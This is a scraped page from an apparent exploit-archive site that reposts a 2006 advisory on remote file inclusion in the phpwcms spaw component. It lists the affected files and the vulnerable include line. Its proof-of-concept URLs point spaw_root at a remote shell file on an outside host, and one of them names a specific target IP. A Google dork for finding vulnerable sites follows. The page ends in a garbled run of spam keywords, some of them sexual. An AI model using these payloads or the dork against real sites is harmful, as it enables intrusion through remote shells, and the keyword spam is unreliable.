about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability




2006-08-10 phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability 
Rated as : Moderate Risk

PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Discovered by :

|\/| _ ._ _  _.._
|  |(_)| (_|(_|| |
          _|



Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmo
rgan.net/shell.dat?

Example:
http://132.195.14.67/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=h
ttp://ehmorgan.net/shell.dat?

Google Dork:

inurl:"phpwcms/index.php?id="

Visit us :

www.ehmorgan.net
irc.gigachat.net
#Morgan
securitydot.net - 2006-08-10

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 07:22:57 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.silkro sexy lesbi Girls havi client exe sex viedio Freesexywa www.skszx. sexmomo Open pictu single aft www.avizon www.hbxfds 2wire imgsrc+ru Azrael\\\' www.skszx. Fuckingpus ww.xnxx.co sex viedio www.51dna bbs.cx5566 www.sex.co imgsrc+ru news for C PDAdmin www.ddyt.c Fuckpussyv phpbb 2.0. Sxeygirl.c news for c www.massag www.koyaa. www.jujiam india CMS is Fre www.metaca www.jujiam sexe heroe GET /galle www.meiron nayan thar Free sex w wwwiranian Nacked pho www.sdrule www.thatst free live Shopping C Game loft adodb_lite